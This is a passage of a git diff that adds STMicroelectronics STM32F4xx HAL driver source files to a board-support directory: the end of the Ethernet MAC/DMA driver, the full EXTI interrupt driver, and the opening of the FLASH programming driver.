ETH_DMA_IT_R); + } + + /* Initialize MAC address in ethernet MAC */ + ETH_MACAddressConfig(heth, ETH_MAC_ADDRESS0, heth->Init.MACAddr); +} + +/** + * @brief Configures the selected MAC address. + * @param heth pointer to a ETH_HandleTypeDef structure that contains + * the configuration information for ETHERNET module + * @param MacAddr The MAC address to configure + * This parameter can be one of the following values: + * @arg ETH_MAC_Address0: MAC Address0 + * @arg ETH_MAC_Address1: MAC Address1 + * @arg ETH_MAC_Address2: MAC Address2 + * @arg ETH_MAC_Address3: MAC Address3 + * @param Addr Pointer to MAC address buffer data (6 bytes) + * @retval HAL status + */ +static void ETH_MACAddressConfig(ETH_HandleTypeDef *heth, uint32_t MacAddr, uint8_t *Addr) +{ + uint32_t tmpreg1; + + /* Prevent unused argument(s) compilation warning */ + UNUSED(heth); + + /* Check the parameters */ + assert_param(IS_ETH_MAC_ADDRESS0123(MacAddr)); + + /* Calculate the selected MAC address high register */ + tmpreg1 = ((uint32_t)Addr[5U] << 8U) | (uint32_t)Addr[4U]; + /* Load the selected MAC address high register */ + (*(__IO uint32_t *)((uint32_t)(ETH_MAC_ADDR_HBASE + MacAddr))) = tmpreg1; + /* Calculate the selected MAC address low register */ + tmpreg1 = ((uint32_t)Addr[3U] << 24U) | ((uint32_t)Addr[2U] << 16U) | ((uint32_t)Addr[1U] << 8U) | Addr[0U]; + + /* Load the selected MAC address low register */ + (*(__IO uint32_t *)((uint32_t)(ETH_MAC_ADDR_LBASE + MacAddr))) = tmpreg1; +} + +/** + * @brief Enables the MAC transmission. + * @param heth pointer to a ETH_HandleTypeDef structure that contains + * the configuration information for ETHERNET module + * @retval None + */ +static void ETH_MACTransmissionEnable(ETH_HandleTypeDef *heth) +{ + __IO uint32_t tmpreg1 = 0U; + + /* Enable the MAC transmission */ + (heth->Instance)->MACCR |= ETH_MACCR_TE; + + /* Wait until the write operation will be taken into account: + at least four TX_CLK/RX_CLK clock cycles */ + tmpreg1 = (heth->Instance)->MACCR; + ETH_Delay(ETH_REG_WRITE_DELAY); + (heth->Instance)->MACCR = tmpreg1; +} + +/** + * @brief Disables the MAC transmission. + * @param heth pointer to a ETH_HandleTypeDef structure that contains + * the configuration information for ETHERNET module + * @retval None + */ +static void ETH_MACTransmissionDisable(ETH_HandleTypeDef *heth) +{ + __IO uint32_t tmpreg1 = 0U; + + /* Disable the MAC transmission */ + (heth->Instance)->MACCR &= ~ETH_MACCR_TE; + + /* Wait until the write operation will be taken into account: + at least four TX_CLK/RX_CLK clock cycles */ + tmpreg1 = (heth->Instance)->MACCR; + ETH_Delay(ETH_REG_WRITE_DELAY); + (heth->Instance)->MACCR = tmpreg1; +} + +/** + * @brief Enables the MAC reception. + * @param heth pointer to a ETH_HandleTypeDef structure that contains + * the configuration information for ETHERNET module + * @retval None + */ +static void ETH_MACReceptionEnable(ETH_HandleTypeDef *heth) +{ + __IO uint32_t tmpreg1 = 0U; + + /* Enable the MAC reception */ + (heth->Instance)->MACCR |= ETH_MACCR_RE; + + /* Wait until the write operation will be taken into account: + at least four TX_CLK/RX_CLK clock cycles */ + tmpreg1 = (heth->Instance)->MACCR; + ETH_Delay(ETH_REG_WRITE_DELAY); + (heth->Instance)->MACCR = tmpreg1; +} + +/** + * @brief Disables the MAC reception. + * @param heth pointer to a ETH_HandleTypeDef structure that contains + * the configuration information for ETHERNET module + * @retval None + */ +static void ETH_MACReceptionDisable(ETH_HandleTypeDef *heth) +{ + __IO uint32_t tmpreg1 = 0U; + + /* Disable the MAC reception */ + (heth->Instance)->MACCR &= ~ETH_MACCR_RE; + + /* Wait until the write operation will be taken into account: + at least four TX_CLK/RX_CLK clock cycles */ + tmpreg1 = (heth->Instance)->MACCR; + ETH_Delay(ETH_REG_WRITE_DELAY); + (heth->Instance)->MACCR = tmpreg1; +} + +/** + * @brief Enables the DMA transmission. + * @param heth pointer to a ETH_HandleTypeDef structure that contains + * the configuration information for ETHERNET module + * @retval None + */ +static void ETH_DMATransmissionEnable(ETH_HandleTypeDef *heth) +{ + /* Enable the DMA transmission */ + (heth->Instance)->DMAOMR |= ETH_DMAOMR_ST; +} + +/** + * @brief Disables the DMA transmission. + * @param heth pointer to a ETH_HandleTypeDef structure that contains + * the configuration information for ETHERNET module + * @retval None + */ +static void ETH_DMATransmissionDisable(ETH_HandleTypeDef *heth) +{ + /* Disable the DMA transmission */ + (heth->Instance)->DMAOMR &= ~ETH_DMAOMR_ST; +} + +/** + * @brief Enables the DMA reception. + * @param heth pointer to a ETH_HandleTypeDef structure that contains + * the configuration information for ETHERNET module + * @retval None + */ +static void ETH_DMAReceptionEnable(ETH_HandleTypeDef *heth) +{ + /* Enable the DMA reception */ + (heth->Instance)->DMAOMR |= ETH_DMAOMR_SR; +} + +/** + * @brief Disables the DMA reception. + * @param heth pointer to a ETH_HandleTypeDef structure that contains + * the configuration information for ETHERNET module + * @retval None + */ +static void ETH_DMAReceptionDisable(ETH_HandleTypeDef *heth) +{ + /* Disable the DMA reception */ + (heth->Instance)->DMAOMR &= ~ETH_DMAOMR_SR; +} + +/** + * @brief Clears the ETHERNET transmit FIFO. + * @param heth pointer to a ETH_HandleTypeDef structure that contains + * the configuration information for ETHERNET module + * @retval None + */ +static void ETH_FlushTransmitFIFO(ETH_HandleTypeDef *heth) +{ + __IO uint32_t tmpreg1 = 0U; + + /* Set the Flush Transmit FIFO bit */ + (heth->Instance)->DMAOMR |= ETH_DMAOMR_FTF; + + /* Wait until the write operation will be taken into account: + at least four TX_CLK/RX_CLK clock cycles */ + tmpreg1 = (heth->Instance)->DMAOMR; + ETH_Delay(ETH_REG_WRITE_DELAY); + (heth->Instance)->DMAOMR = tmpreg1; +} + +/** + * @brief This function provides delay (in milliseconds) based on CPU cycles method. + * @param mdelay specifies the delay time length, in milliseconds. + * @retval None + */ +static void ETH_Delay(uint32_t mdelay) +{ + __IO uint32_t Delay = mdelay * (SystemCoreClock / 8U / 1000U); + do + { + __NOP(); + } + while (Delay --); +} + +#if (USE_HAL_ETH_REGISTER_CALLBACKS == 1) +static void ETH_InitCallbacksToDefault(ETH_HandleTypeDef *heth) +{ + /* Init the ETH Callback settings */ + heth->TxCpltCallback = HAL_ETH_TxCpltCallback; /* Legacy weak TxCpltCallback */ + heth->RxCpltCallback = HAL_ETH_RxCpltCallback; /* Legacy weak RxCpltCallback */ + heth->DMAErrorCallback = HAL_ETH_ErrorCallback; /* Legacy weak DMAErrorCallback */ +} +#endif /* USE_HAL_ETH_REGISTER_CALLBACKS */ + +/** + * @} + */ + +#endif /* STM32F405xx || STM32F415xx || STM32F407xx || STM32F417xx || STM32F427xx ||\ + STM32F437xx || STM32F429xx || STM32F439xx || STM32F469xx || STM32F479xx */ +#endif /* HAL_ETH_MODULE_ENABLED */ +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_exti.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_exti.c new file mode 100644 index 000000000..099bf1ea2 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_exti.c @@ -0,0 +1,549 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_exti.c + * @author MCD Application Team + * @brief EXTI HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of the Extended Interrupts and events controller (EXTI) peripheral: + * + Initialization and de-initialization functions + * + IO operation functions + * + @verbatim + ============================================================================== + ##### EXTI Peripheral features ##### + ============================================================================== + [..] + (+) Each Exti line can be configured within this driver. + + (+) Exti line can be configured in 3 different modes + (++) Interrupt + (++) Event + (++) Both of them + + (+) Configurable Exti lines can be configured with 3 different triggers + (++) Rising + (++) Falling + (++) Both of them + + (+) When set in interrupt mode, configurable Exti lines have two different + interrupts pending registers which allow to distinguish which transition + occurs: + (++) Rising edge pending interrupt + (++) Falling + + (+) Exti lines 0 to 15 are linked to gpio pin number 0 to 15. Gpio port can + be selected through multiplexer. + + ##### How to use this driver ##### + ============================================================================== + [..] + + (#) Configure the EXTI line using HAL_EXTI_SetConfigLine(). + (++) Choose the interrupt line number by setting "Line" member from + EXTI_ConfigTypeDef structure. + (++) Configure the interrupt and/or event mode using "Mode" member from + EXTI_ConfigTypeDef structure. + (++) For configurable lines, configure rising and/or falling trigger + "Trigger" member from EXTI_ConfigTypeDef structure. + (++) For Exti lines linked to gpio, choose gpio port using "GPIOSel" + member from GPIO_InitTypeDef structure. + + (#) Get current Exti configuration of a dedicated line using + HAL_EXTI_GetConfigLine(). + (++) Provide exiting handle as parameter. + (++) Provide pointer on EXTI_ConfigTypeDef structure as second parameter. + + (#) Clear Exti configuration of a dedicated line using HAL_EXTI_GetConfigLine(). + (++) Provide exiting handle as parameter. + + (#) Register callback to treat Exti interrupts using HAL_EXTI_RegisterCallback(). + (++) Provide exiting handle as first parameter. + (++) Provide which callback will be registered using one value from + EXTI_CallbackIDTypeDef. + (++) Provide callback function pointer. + + (#) Get interrupt pending bit using HAL_EXTI_GetPending(). + + (#) Clear interrupt pending bit using HAL_EXTI_GetPending(). + + (#) Generate software interrupt using HAL_EXTI_GenerateSWI(). + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2018 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @addtogroup EXTI + * @{ + */ +/** MISRA C:2012 deviation rule has been granted for following rule: + * Rule-18.1_b - Medium: Array `EXTICR' 1st subscript interval [0,7] may be out + * of bounds [0,3] in following API : + * HAL_EXTI_SetConfigLine + * HAL_EXTI_GetConfigLine + * HAL_EXTI_ClearConfigLine + */ + +#ifdef HAL_EXTI_MODULE_ENABLED + +/* Private typedef -----------------------------------------------------------*/ +/* Private defines -----------------------------------------------------------*/ +/** @defgroup EXTI_Private_Constants EXTI Private Constants + * @{ + */ + +/** + * @} + */ + +/* Private macros ------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +/* Exported functions --------------------------------------------------------*/ + +/** @addtogroup EXTI_Exported_Functions + * @{ + */ + +/** @addtogroup EXTI_Exported_Functions_Group1 + * @brief Configuration functions + * +@verbatim + =============================================================================== + ##### Configuration functions ##### + =============================================================================== + +@endverbatim + * @{ + */ + +/** + * @brief Set configuration of a dedicated Exti line. + * @param hexti Exti handle. + * @param pExtiConfig Pointer on EXTI configuration to be set. + * @retval HAL Status. + */ +HAL_StatusTypeDef HAL_EXTI_SetConfigLine(EXTI_HandleTypeDef *hexti, EXTI_ConfigTypeDef *pExtiConfig) +{ + uint32_t regval; + uint32_t linepos; + uint32_t maskline; + + /* Check null pointer */ + if ((hexti == NULL) || (pExtiConfig == NULL)) + { + return HAL_ERROR; + } + + /* Check parameters */ + assert_param(IS_EXTI_LINE(pExtiConfig->Line)); + assert_param(IS_EXTI_MODE(pExtiConfig->Mode)); + + /* Assign line number to handle */ + hexti->Line = pExtiConfig->Line; + + /* Compute line mask */ + linepos = (pExtiConfig->Line & EXTI_PIN_MASK); + maskline = (1uL << linepos); + + /* Configure triggers for configurable lines */ + if ((pExtiConfig->Line & EXTI_CONFIG) != 0x00u) + { + assert_param(IS_EXTI_TRIGGER(pExtiConfig->Trigger)); + + /* Configure rising trigger */ + /* Mask or set line */ + if ((pExtiConfig->Trigger & EXTI_TRIGGER_RISING) != 0x00u) + { + EXTI->RTSR |= maskline; + } + else + { + EXTI->RTSR &= ~maskline; + } + + /* Configure falling trigger */ + /* Mask or set line */ + if ((pExtiConfig->Trigger & EXTI_TRIGGER_FALLING) != 0x00u) + { + EXTI->FTSR |= maskline; + } + else + { + EXTI->FTSR &= ~maskline; + } + + + /* Configure gpio port selection in case of gpio exti line */ + if ((pExtiConfig->Line & EXTI_GPIO) == EXTI_GPIO) + { + assert_param(IS_EXTI_GPIO_PORT(pExtiConfig->GPIOSel)); + assert_param(IS_EXTI_GPIO_PIN(linepos)); + + regval = SYSCFG->EXTICR[linepos >> 2u]; + regval &= ~(SYSCFG_EXTICR1_EXTI0 << (SYSCFG_EXTICR1_EXTI1_Pos * (linepos & 0x03u))); + regval |= (pExtiConfig->GPIOSel << (SYSCFG_EXTICR1_EXTI1_Pos * (linepos & 0x03u))); + SYSCFG->EXTICR[linepos >> 2u] = regval; + } + } + + /* Configure interrupt mode : read current mode */ + /* Mask or set line */ + if ((pExtiConfig->Mode & EXTI_MODE_INTERRUPT) != 0x00u) + { + EXTI->IMR |= maskline; + } + else + { + EXTI->IMR &= ~maskline; + } + + /* Configure event mode : read current mode */ + /* Mask or set line */ + if ((pExtiConfig->Mode & EXTI_MODE_EVENT) != 0x00u) + { + EXTI->EMR |= maskline; + } + else + { + EXTI->EMR &= ~maskline; + } + + return HAL_OK; +} + +/** + * @brief Get configuration of a dedicated Exti line. + * @param hexti Exti handle. + * @param pExtiConfig Pointer on structure to store Exti configuration. + * @retval HAL Status. + */ +HAL_StatusTypeDef HAL_EXTI_GetConfigLine(EXTI_HandleTypeDef *hexti, EXTI_ConfigTypeDef *pExtiConfig) +{ + uint32_t regval; + uint32_t linepos; + uint32_t maskline; + + /* Check null pointer */ + if ((hexti == NULL) || (pExtiConfig == NULL)) + { + return HAL_ERROR; + } + + /* Check the parameter */ + assert_param(IS_EXTI_LINE(hexti->Line)); + + /* Store handle line number to configuration structure */ + pExtiConfig->Line = hexti->Line; + + /* Compute line mask */ + linepos = (pExtiConfig->Line & EXTI_PIN_MASK); + maskline = (1uL << linepos); + + /* 1] Get core mode : interrupt */ + + /* Check if selected line is enable */ + if ((EXTI->IMR & maskline) != 0x00u) + { + pExtiConfig->Mode = EXTI_MODE_INTERRUPT; + } + else + { + pExtiConfig->Mode = EXTI_MODE_NONE; + } + + /* Get event mode */ + /* Check if selected line is enable */ + if ((EXTI->EMR & maskline) != 0x00u) + { + pExtiConfig->Mode |= EXTI_MODE_EVENT; + } + + /* Get default Trigger and GPIOSel configuration */ + pExtiConfig->Trigger = EXTI_TRIGGER_NONE; + pExtiConfig->GPIOSel = 0x00u; + + /* 2] Get trigger for configurable lines : rising */ + if ((pExtiConfig->Line & EXTI_CONFIG) != 0x00u) + { + /* Check if configuration of selected line is enable */ + if ((EXTI->RTSR & maskline) != 0x00u) + { + pExtiConfig->Trigger = EXTI_TRIGGER_RISING; + } + + /* Get falling configuration */ + /* Check if configuration of selected line is enable */ + if ((EXTI->FTSR & maskline) != 0x00u) + { + pExtiConfig->Trigger |= EXTI_TRIGGER_FALLING; + } + + /* Get Gpio port selection for gpio lines */ + if ((pExtiConfig->Line & EXTI_GPIO) == EXTI_GPIO) + { + assert_param(IS_EXTI_GPIO_PIN(linepos)); + + regval = SYSCFG->EXTICR[linepos >> 2u]; + pExtiConfig->GPIOSel = ((regval << (SYSCFG_EXTICR1_EXTI1_Pos * (3uL - (linepos & 0x03u)))) >> 24); + } + } + + return HAL_OK; +} + +/** + * @brief Clear whole configuration of a dedicated Exti line. + * @param hexti Exti handle. + * @retval HAL Status. + */ +HAL_StatusTypeDef HAL_EXTI_ClearConfigLine(EXTI_HandleTypeDef *hexti) +{ + uint32_t regval; + uint32_t linepos; + uint32_t maskline; + + /* Check null pointer */ + if (hexti == NULL) + { + return HAL_ERROR; + } + + /* Check the parameter */ + assert_param(IS_EXTI_LINE(hexti->Line)); + + /* compute line mask */ + linepos = (hexti->Line & EXTI_PIN_MASK); + maskline = (1uL << linepos); + + /* 1] Clear interrupt mode */ + EXTI->IMR = (EXTI->IMR & ~maskline); + + /* 2] Clear event mode */ + EXTI->EMR = (EXTI->EMR & ~maskline); + + /* 3] Clear triggers in case of configurable lines */ + if ((hexti->Line & EXTI_CONFIG) != 0x00u) + { + EXTI->RTSR = (EXTI->RTSR & ~maskline); + EXTI->FTSR = (EXTI->FTSR & ~maskline); + + /* Get Gpio port selection for gpio lines */ + if ((hexti->Line & EXTI_GPIO) == EXTI_GPIO) + { + assert_param(IS_EXTI_GPIO_PIN(linepos)); + + regval = SYSCFG->EXTICR[linepos >> 2u]; + regval &= ~(SYSCFG_EXTICR1_EXTI0 << (SYSCFG_EXTICR1_EXTI1_Pos * (linepos & 0x03u))); + SYSCFG->EXTICR[linepos >> 2u] = regval; + } + } + + return HAL_OK; +} + +/** + * @brief Register callback for a dedicated Exti line. + * @param hexti Exti handle. + * @param CallbackID User callback identifier. + * This parameter can be one of @arg @ref EXTI_CallbackIDTypeDef values. + * @param pPendingCbfn function pointer to be stored as callback. + * @retval HAL Status. + */ +HAL_StatusTypeDef HAL_EXTI_RegisterCallback(EXTI_HandleTypeDef *hexti, EXTI_CallbackIDTypeDef CallbackID, void (*pPendingCbfn)(void)) +{ + HAL_StatusTypeDef status = HAL_OK; + + switch (CallbackID) + { + case HAL_EXTI_COMMON_CB_ID: + hexti->PendingCallback = pPendingCbfn; + break; + + default: + status = HAL_ERROR; + break; + } + + return status; +} + +/** + * @brief Store line number as handle private field. + * @param hexti Exti handle. + * @param ExtiLine Exti line number. + * This parameter can be from 0 to @ref EXTI_LINE_NB. + * @retval HAL Status. + */ +HAL_StatusTypeDef HAL_EXTI_GetHandle(EXTI_HandleTypeDef *hexti, uint32_t ExtiLine) +{ + /* Check the parameters */ + assert_param(IS_EXTI_LINE(ExtiLine)); + + /* Check null pointer */ + if (hexti == NULL) + { + return HAL_ERROR; + } + else + { + /* Store line number as handle private field */ + hexti->Line = ExtiLine; + + return HAL_OK; + } +} + +/** + * @} + */ + +/** @addtogroup EXTI_Exported_Functions_Group2 + * @brief EXTI IO functions. + * +@verbatim + =============================================================================== + ##### IO operation functions ##### + =============================================================================== + +@endverbatim + * @{ + */ + +/** + * @brief Handle EXTI interrupt request. + * @param hexti Exti handle. + * @retval none. + */ +void HAL_EXTI_IRQHandler(EXTI_HandleTypeDef *hexti) +{ + uint32_t regval; + uint32_t maskline; + + /* Compute line mask */ + maskline = (1uL << (hexti->Line & EXTI_PIN_MASK)); + + /* Get pending bit */ + regval = (EXTI->PR & maskline); + if (regval != 0x00u) + { + /* Clear pending bit */ + EXTI->PR = maskline; + + /* Call callback */ + if (hexti->PendingCallback != NULL) + { + hexti->PendingCallback(); + } + } +} + +/** + * @brief Get interrupt pending bit of a dedicated line. + * @param hexti Exti handle. + * @param Edge Specify which pending edge as to be checked. + * This parameter can be one of the following values: + * @arg @ref EXTI_TRIGGER_RISING_FALLING + * This parameter is kept for compatibility with other series. + * @retval 1 if interrupt is pending else 0. + */ +uint32_t HAL_EXTI_GetPending(EXTI_HandleTypeDef *hexti, uint32_t Edge) +{ + uint32_t regval; + uint32_t linepos; + uint32_t maskline; + + /* Check parameters */ + assert_param(IS_EXTI_LINE(hexti->Line)); + assert_param(IS_EXTI_CONFIG_LINE(hexti->Line)); + assert_param(IS_EXTI_PENDING_EDGE(Edge)); + + /* Compute line mask */ + linepos = (hexti->Line & EXTI_PIN_MASK); + maskline = (1uL << linepos); + + /* return 1 if bit is set else 0 */ + regval = ((EXTI->PR & maskline) >> linepos); + return regval; +} + +/** + * @brief Clear interrupt pending bit of a dedicated line. + * @param hexti Exti handle. + * @param Edge Specify which pending edge as to be clear. + * This parameter can be one of the following values: + * @arg @ref EXTI_TRIGGER_RISING_FALLING + * This parameter is kept for compatibility with other series. + * @retval None. + */ +void HAL_EXTI_ClearPending(EXTI_HandleTypeDef *hexti, uint32_t Edge) +{ + uint32_t maskline; + + /* Check parameters */ + assert_param(IS_EXTI_LINE(hexti->Line)); + assert_param(IS_EXTI_CONFIG_LINE(hexti->Line)); + assert_param(IS_EXTI_PENDING_EDGE(Edge)); + + /* Compute line mask */ + maskline = (1uL << (hexti->Line & EXTI_PIN_MASK)); + + /* Clear Pending bit */ + EXTI->PR = maskline; +} + +/** + * @brief Generate a software interrupt for a dedicated line. + * @param hexti Exti handle. + * @retval None. + */ +void HAL_EXTI_GenerateSWI(EXTI_HandleTypeDef *hexti) +{ + uint32_t maskline; + + /* Check parameters */ + assert_param(IS_EXTI_LINE(hexti->Line)); + assert_param(IS_EXTI_CONFIG_LINE(hexti->Line)); + + /* Compute line mask */ + maskline = (1uL << (hexti->Line & EXTI_PIN_MASK)); + + /* Generate Software interrupt */ + EXTI->SWIER = maskline; +} + +/** + * @} + */ + +/** + * @} + */ + +#endif /* HAL_EXTI_MODULE_ENABLED */ +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_flash.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_flash.c new file mode 100644 index 000000000..69b47a6ec --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_flash.c @@ -0,0 +1,778 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_flash.c + * @author MCD Application Team + * @brief FLASH HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of the internal FLASH memory: + * + Program operations functions + * + Memory Control functions + * + Peripheral Errors functions + * + @verbatim + ============================================================================== + ##### FLASH peripheral features ##### + ============================================================================== + + [..] The Flash memory interface manages CPU AHB I-Code and D-Code accesses + to the Flash memory. It implements the erase and program Flash memory operations + and the read and write protection mechanisms. + + [..] The Flash memory interface accelerates code execution with a system of instruction + prefetch and cache lines. + + [..] The FLASH main features are: + (+) Flash memory read operations + (+) Flash memory program/erase operations + (+) Read / write protections + (+) Prefetch on I-Code + (+) 64 cache lines of 128 bits on I-Code + (+) 8 cache lines of 128 bits on D-Code + + + ##### How to use this driver ##### + ============================================================================== + [..] + This driver provides functions and macros to configure and program the FLASH + memory of all STM32F4xx devices. + + (#) FLASH Memory IO Programming functions: + (++) Lock and Unlock the FLASH interface using HAL_FLASH_Unlock() and + HAL_FLASH_Lock() functions + (++) Program functions: byte, half word, word and double word + (++) There Two modes of programming : + (+++) Polling mode using HAL_FLASH_Program() function + (+++) Interrupt mode using HAL_FLASH_Program_IT() function + + (#) Interrupts and flags management functions : + (++) Handle FLASH interrupts by calling HAL_FLASH_IRQHandler() + (++) Wait for last FLASH operation according to its status + (++) Get error flag status by calling HAL_SetErrorCode() + + [..] + In addition to these functions, this driver includes a set of macros allowing + to handle the following operations: + (+) Set the latency + (+) Enable/Disable the prefetch buffer + (+) Enable/Disable the Instruction cache and the Data cache + (+) Reset the Instruction cache and the Data cache + (+) Enable/Disable the FLASH interrupts + (+) Monitor the FLASH flags status + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup FLASH FLASH + * @brief FLASH HAL module driver + * @{ + */ + +#ifdef HAL_FLASH_MODULE_ENABLED + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/** @addtogroup FLASH_Private_Constants + * @{ + */ +#define FLASH_TIMEOUT_VALUE 50000U /* 50 s */ +/** + * @} + */ +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/** @addtogroup FLASH_Private_Variables + * @{ + */ +/* Variable used for Erase sectors under interruption */ +FLASH_ProcessTypeDef pFlash; +/** + * @} + */ + +/* Private function prototypes -----------------------------------------------*/ +/** @addtogroup FLASH_Private_Functions + * @{ + */ +/* Program operations */ +static void FLASH_Program_DoubleWord(uint32_t Address, uint64_t Data); +static void FLASH_Program_Word(uint32_t Address, uint32_t Data); +static void FLASH_Program_HalfWord(uint32_t Address, uint16_t Data); +static void FLASH_Program_Byte(uint32_t Address, uint8_t Data); +static void FLASH_SetErrorCode(void); + +HAL_StatusTypeDef FLASH_WaitForLastOperation(uint32_t Timeout); +/** + * @} + */ + +/* Exported functions --------------------------------------------------------*/ +/** @defgroup FLASH_Exported_Functions FLASH Exported Functions + * @{ + */ + +/** @defgroup FLASH_Exported_Functions_Group1 Programming operation functions + * @brief Programming operation functions + * +@verbatim + =============================================================================== + ##### Programming operation functions ##### + =============================================================================== + [..] + This subsection provides a set of functions allowing to manage the FLASH + program operations. + +@endverbatim + * @{ + */ + +/** + * @brief Program byte, halfword, word or double word at a specified address + * @param TypeProgram Indicate the way to program at a specified address. + * This parameter can be a value of @ref FLASH_Type_Program + * @param Address specifies the address to be programmed. + * @param Data specifies the data to be programmed + * + * @retval HAL_StatusTypeDef HAL Status + */ +HAL_StatusTypeDef HAL_FLASH_Program(uint32_t TypeProgram, uint32_t Address, uint64_t Data) +{ + HAL_StatusTypeDef status = HAL_ERROR; + + /* Process Locked */ + __HAL_LOCK(&pFlash); + + /* Check the parameters */ + assert_param(IS_FLASH_TYPEPROGRAM(TypeProgram)); + + /* Wait for last operation to be completed */ + status = FLASH_WaitForLastOperation((uint32_t)FLASH_TIMEOUT_VALUE); + + if(status == HAL_OK) + { + if(TypeProgram == FLASH_TYPEPROGRAM_BYTE) + { + /*Program byte (8-bit) at a specified address.*/ + FLASH_Program_Byte(Address, (uint8_t) Data); + } + else if(TypeProgram == FLASH_TYPEPROGRAM_HALFWORD) + { + /*Program halfword (16-bit) at a specified address.*/ + FLASH_Program_HalfWord(Address, (uint16_t) Data); + } + else if(TypeProgram == FLASH_TYPEPROGRAM_WORD) + { + /*Program word (32-bit) at a specified address.*/ + FLASH_Program_Word(Address, (uint32_t) Data); + } + else + { + /*Program double word (64-bit) at a specified address.*/ + FLASH_Program_DoubleWord(Address, Data); + } + + /* Wait for last operation to be completed */ + status = FLASH_WaitForLastOperation((uint32_t)FLASH_TIMEOUT_VALUE); + + /* If the program operation is completed, disable the PG Bit */ + FLASH->CR &= (~FLASH_CR_PG); + } + + /* Process Unlocked */ + __HAL_UNLOCK(&pFlash); + + return status; +} + +/** + * @brief Program byte, halfword, word or double word at a specified address with interrupt enabled. + * @param TypeProgram Indicate the way to program at a specified address. + * This parameter can be a value of @ref FLASH_Type_Program + * @param Address specifies the address to be programmed. + * @param Data specifies the data to be programmed + * + * @retval HAL Status + */ +HAL_StatusTypeDef HAL_FLASH_Program_IT(uint32_t TypeProgram, uint32_t Address, uint64_t Data) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process Locked */ + __HAL_LOCK(&pFlash); + + /* Check the parameters */ + assert_param(IS_FLASH_TYPEPROGRAM(TypeProgram)); + + /* Enable End of FLASH Operation interrupt */ + __HAL_FLASH_ENABLE_IT(FLASH_IT_EOP); + + /* Enable Error source interrupt */ + __HAL_FLASH_ENABLE_IT(FLASH_IT_ERR); + + pFlash.ProcedureOnGoing = FLASH_PROC_PROGRAM; + pFlash.Address = Address; + + if(TypeProgram == FLASH_TYPEPROGRAM_BYTE) + { + /*Program byte (8-bit) at a specified address.*/ + FLASH_Program_Byte(Address, (uint8_t) Data); + } + else if(TypeProgram == FLASH_TYPEPROGRAM_HALFWORD) + { + /*Program halfword (16-bit) at a specified address.*/ + FLASH_Program_HalfWord(Address, (uint16_t) Data); + } + else if(TypeProgram == FLASH_TYPEPROGRAM_WORD) + { + /*Program word (32-bit) at a specified address.*/ + FLASH_Program_Word(Address, (uint32_t) Data); + } + else + { + /*Program double word (64-bit) at a specified address.*/ + FLASH_Program_DoubleWord(Address, Data); + } + + return status; +} + +/** + * @brief This function handles FLASH interrupt request. + * @retval None + */ +void HAL_FLASH_IRQHandler(void) +{ + uint32_t addresstmp = 0U; + + /* Check FLASH operation error flags */ +#if defined(FLASH_SR_RDERR) + if(__HAL_FLASH_GET_FLAG((FLASH_FLAG_OPERR | FLASH_FLAG_WRPERR | FLASH_FLAG_PGAERR | \ + FLASH_FLAG_PGPERR | FLASH_FLAG_PGSERR | FLASH_FLAG_RDERR)) != RESET) +#else + if(__HAL_FLASH_GET_FLAG((FLASH_FLAG_OPERR | FLASH_FLAG_WRPERR | FLASH_FLAG_PGAERR | \ + FLASH_FLAG_PGPERR | FLASH_FLAG_PGSERR)) != RESET) +#endif /* FLASH_SR_RDERR */ + { + if(pFlash.ProcedureOnGoing == FLASH_PROC_SECTERASE) + { + /*return the faulty sector*/ + addresstmp = pFlash.Sector; + pFlash.Sector = 0xFFFFFFFFU; + } + else if(pFlash.ProcedureOnGoing == FLASH_PROC_MASSERASE) + { + /*return the faulty bank*/ + addresstmp = pFlash.Bank; + } + else + { + /*return the faulty address*/ + addresstmp = pFlash.Address; + } + + /*Save the Error code*/ + FLASH_SetErrorCode(); + + /* FLASH error interrupt user callback */ + HAL_FLASH_OperationErrorCallback(addresstmp); + + /*Stop the procedure ongoing*/ + pFlash.ProcedureOnGoing = FLASH_PROC_NONE; + } + + /* Check FLASH End of Operation flag */ + if(__HAL_FLASH_GET_FLAG(FLASH_FLAG_EOP) != RESET) + { + /* Clear FLASH End of Operation pending bit */ + __HAL_FLASH_CLEAR_FLAG(FLASH_FLAG_EOP); + + if(pFlash.ProcedureOnGoing == FLASH_PROC_SECTERASE) + { + /*Nb of sector to erased can be decreased*/ + pFlash.NbSectorsToErase--; + + /* Check if there are still sectors to erase*/ + if(pFlash.NbSectorsToErase != 0U) + { + addresstmp = pFlash.Sector; + /*Indicate user which sector has been erased*/ + HAL_FLASH_EndOfOperationCallback(addresstmp); 